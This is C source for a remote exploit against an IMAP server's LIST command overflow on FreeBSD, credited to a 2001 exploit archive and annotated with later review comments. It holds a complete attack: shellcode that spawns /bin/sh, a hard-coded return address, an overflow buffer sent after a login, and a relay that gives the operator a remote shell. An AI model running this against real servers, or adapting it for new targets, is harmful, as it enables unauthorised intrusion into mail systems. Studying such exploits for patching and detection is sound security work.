//
// imapd sploit
// [ list/lsub vulnerability ]
//
// eggcode:
// freebsd
//
// default valuez for target:
// freebsd4.0-rel + imap4rev1 2000.278
//
// coder:
// p0kem0n / kidz team
// email:
// <p0kem0n@hotbox.ru>
//
// comments:
// i am a lazy shit. so there isn't userfriendly
// command line i-face.
//
// p.s.: no errors checking
//
// greetz to:
// all active members of [kidz team], dummYcube, mazz
//
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#define IMAP_PORT 143
#define FAT 512
#define BUF_SIZE 1024
#define LBUF 512
//#define DEBUG
#define LOGIN "uza" // don't forget to modify
#define PASSWORD "lapassworde"
// The payload ("egg") that the carrier delivers; the header above lists it as
// the FreeBSD variant. alien_makeup() copies strlen(egg) bytes of it into the
// carrier at offset FAT, so the string literal's trailing NUL is not copied.
char alien_egg[] = // idea of anathema. respect.
"\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3"
"\x51\x52\x53\x53\x6a\x3b\x58\xcd\x80\x66\x31\xc0\xcd\x80";
// Hard-coded address for the default target named in the header. alien_makeup()
// stores body_addr+FAT into the carrier at offset BUF_SIZE+4 through an
// unsigned long*, so this only has the intended 4-byte layout where
// sizeof(unsigned long) == 4. Nothing here derives or verifies the value; it
// is valid only for the exact build/environment it was measured on.
unsigned long body_addr = 0xbfbfeb68; // calibrate it for non default
//0xbfbfea4c - preauth mode
// Fill the 4*LBUF-byte carrier: 0x90 fill, egg at offset FAT, two address-sized
// words at BUF_SIZE+4 and BUF_SIZE+8. Does not allocate; caller owns carrier.
void alien_makeup(char* carrier, char* egg);
// TCP-connect to hosty:port. Returns the socket fd, or -1 if socket(),
// gethostbyname() or connect() fails (the fd is closed on the latter two).
int arrive(char* hosty, int port);
// Run the IMAP exchange on fd body. Returns 1 on apparent success, -1 on a
// recv()/send() failure, -3 when the LOGIN reply is not "OK", -2 when the
// server answers the LIST cleanly with "BAD" or "OK". Closes body on every
// failure return.
int infect(int body, char* carrier);
// Relay bytes between stdin/stdout and body until read() on either side
// returns 0 or an error. Does not close body.
void alien_work(int body);
// Entry point. argv[1] is the host to connect to on IMAP_PORT. Sequence:
// build carrier -> arrive() -> infect() -> alien_work(). Exits with status 1
// on any failure; on success control falls off the end of main without an
// explicit return statement.
// NOTE(review): printf() and exit() are used without <stdio.h>/<stdlib.h>
// (neither is included above), so both are implicitly declared.
// NOTE(review): on the success path the socket is never close()d; it is
// released only when the process exits.
int main(int argc, char** argv) {
char carrier[4*LBUF]; // 2048 bytes, filled by alien_makeup()
int payback; // result code from infect()
int body; // connected socket from arrive()
printf(" [ %-11s ][ starting.... ]\n", argv[0]); // printed before argc is checked
if(argc != 2) {
printf("\t\t[ error in parameterz! ]\n");
printf("\t\t[ you must specify host ]\n");
exit(1);
}
alien_makeup(carrier, alien_egg);
printf("\t\t[ alien maked ]\n");
printf("\t\t[ connect to %.32s.... ]\n", argv[1]); // host name truncated to 32 chars for display only
body = arrive(argv[1], IMAP_PORT);
if(body < 0) {
printf("\t\t\t[ failed! ]\n");
exit(1);
}
printf("\t\t\t[ successful ]\n");
// infect() has already closed body on every negative return.
if((payback = infect(body, carrier)) < 0) {
printf("\t\t[ error sending carrier ]\n\t\t\t[ ");
switch(payback) { // no default: an unexpected code prints an unterminated line
case -1:
printf(" possibly connection error ]\n");
break;
case -2:
printf(" kid, there isn't such a bug! ]\n");
break;
case -3:
printf(" get correct password first! ]\n");
}
exit(1);
}
printf("\t\t[ INFECTED! ]\n");
printf("\t\t[ alien at work ]\n");
printf("\t\t\t[ begin ]\n");
alien_work(body); // returns when either stdin or the socket reaches EOF/error
printf("\t\t\t[ alien iz dead ]\n");
printf("\t\t[ end ]\n");
printf(" [ %-11s ][ session is over ]\n", argv[0]);
}
// Build the 4*LBUF-byte carrier that infect() later sends as the LIST literal.
// Layout: the whole buffer is 0x90-filled; the egg is placed at offset FAT
// (strncpy with strlen(egg) copies no terminator, so the fill continues after
// it); body_addr+FAT is stored at BUF_SIZE+4; 0x00000a0a is stored at
// BUF_SIZE+8. Its zero bytes are what strlen(carrier) in infect() stops at,
// so the bytes from there to 4*LBUF are never sent.
// NOTE(review): the unsigned long* stores assume sizeof(unsigned long) == 4,
// little-endian byte order and tolerated unaligned access; on a 64-bit or
// big-endian ABI the resulting layout is different. The DEBUG printf()s pass
// size_t to %hx and unsigned long to %x (format/argument mismatch).
void alien_makeup(char* carrier, char* egg) {
memset(carrier, 0x90, 4*LBUF);
strncpy(carrier+FAT, egg, strlen(egg)); // exact egg length, no NUL appended
*(unsigned long*)(carrier+BUF_SIZE+4) = body_addr+FAT; // unaligned 4-byte store (see note above)
*(unsigned long*)(carrier+BUF_SIZE+8) = 0x00000a0a; // "\n\n" followed by zero bytes on 32-bit little-endian
#ifdef DEBUG
printf(" [debug][ carrier: %s ]\n", carrier);
printf("\t[ carriersize: %hx ]\n", strlen(carrier));
printf("\t[ eggsize: %hx ]\n", strlen(egg));
printf("\t[ alien_addr: 0x%x ]\n", *(unsigned long*)(carrier+BUF_SIZE+4));
#endif
}
// Open a TCP connection to hosty:port.
// Returns the connected socket descriptor, or -1 when socket creation, name
// resolution or connect() fails; the descriptor is closed on the latter two.
// Resolution goes through gethostbyname() (obsolete, not thread-safe) and the
// first address in h_addr_list is used. sin_zero is left uninitialized, as in
// the original.
int arrive(char* hosty, int port) {
int fd = socket(AF_INET, SOCK_STREAM, 0);
if (fd < 0) {
return -1;
}
struct hostent *host = gethostbyname(hosty);
if (host == NULL) {
close(fd);
return -1;
}
struct sockaddr_in dest;
dest.sin_family = AF_INET;
dest.sin_port = htons(port);
memcpy(&dest.sin_addr.s_addr, host->h_addr_list[0], host->h_length);
if (connect(fd, (struct sockaddr*)&dest, sizeof(dest)) < 0) {
close(fd);
return -1;
}
return fd;
}
// Drive the IMAP exchange on the connected socket `body`.
// Steps: read and discard the server greeting; send LOGIN with the compiled-in
// LOGIN/PASSWORD macros; check the tagged reply; announce a literal of
// BUF_SIZE+8 bytes via LIST; send `carrier`; judge the outcome from the reply.
// Returns 1 on apparent success; -1 on any recv()/send() failure; -3 when the
// LOGIN reply is not "OK"; -2 when the server answers the LIST with a clean
// "BAD" or "OK" (reported by main() as "no such bug"). `body` is close()d on
// every failure return, so the caller must not reuse it afterwards.
// Every reply is inspected at buf+5, i.e. just past the fixed tag "dead ".
// NOTE(review): recv() returning 0 (peer closed) is not treated as an error;
// the zeroed buffer then simply fails the strncmp() checks. A reply that
// fills all LBUF bytes leaves no terminator for the DEBUG "%s" printf().
// NOTE(review): send() is compared against the full length but a short send
// is reported as a connection error rather than retried.
int infect(int body, char* carrier) {
int len;
char buf[LBUF];
memset(buf, 0, LBUF); // zero-fill so a short reply is NUL-terminated
if(recv(body, buf, LBUF, 0) < 0) { // greeting; content is not checked
close(body);
return -1;
}
#ifdef DEBUG
printf(" // %s", buf);
#endif
// Fixed format string and compile-time credentials: the write is bounded by
// construction as long as LOGIN/PASSWORD stay well under LBUF.
sprintf(buf, "dead login "LOGIN" "PASSWORD"\n");
len = strlen(buf);
if(send(body, buf, len, 0) < len) {
close(body);
return -1;
}
memset(buf, 0, LBUF);
if(recv(body, buf, LBUF, 0) < 0) {
close(body);
return -1;
}
#ifdef DEBUG
printf(" // %s", buf);
#endif
if(strncmp(buf+5, "OK", 2) != 0) { // expect "dead OK ..."
close(body);
return -3;
}
buf[0] = '\0'; // redundant: sprintf() below overwrites from buf[0]
sprintf(buf, "dead list \"\" {%d}\n", BUF_SIZE+8); // announces a BUF_SIZE+8 byte literal
len = strlen(buf);
if(send(body, buf, len, 0) < len) {
close(body);
return -1;
}
// Bytes actually sent = up to the first zero byte alien_makeup() placed,
// not the full 4*LBUF carrier.
len = strlen(carrier);
if(send(body, carrier, len, 0) < len) {
close(body);
return -1;
}
memset(buf, 0, LBUF);
if(recv(body, buf, LBUF, 0) < 0) {
close(body);
return -1;
}
#ifdef DEBUG
printf(" // %s", buf);
#endif
// A well-formed tagged reply means the server handled the literal normally.
if((strncmp(buf+5, "BAD", 3) == 0)||(strncmp(buf+5, "OK", 2) == 0)) {
close(body);
return -2;
}
return 1;
}
// Interactive relay: copy stdin (fd 0) to `body` and `body` to stdout (fd 1)
// until read() on either side returns 0 (EOF) or an error. Does not close
// `body`; the caller is responsible for it.
// NOTE(review): fds is never cleared with FD_ZERO(), so its initial contents
// are indeterminate. The return values of select() and write() are not
// checked, and a short write() is not retried. read()/write() are used
// without <unistd.h>, which is not included above.
void alien_work(int body) {
int len; // byte count from the most recent read()
char buf[LBUF]; // shared copy buffer for both directions
fd_set fds;
while (1) {
FD_SET(0, &fds);
FD_SET(body, &fds);
select(body+1, &fds, NULL, NULL, NULL); // block until stdin or body is readable
if (FD_ISSET(0, &fds)) {
len = read (0, buf, LBUF);
if (len <= 0) // EOF or error on stdin ends the session
return;
write (body, buf, len);
}
if (FD_ISSET(body, &fds)) {
len = read (body, buf, LBUF);
if (len <= 0) // peer closed or error ends the session
return;
write(1, buf, len);
}
}
}
/* www.hack.co.za [14 April 2001]*/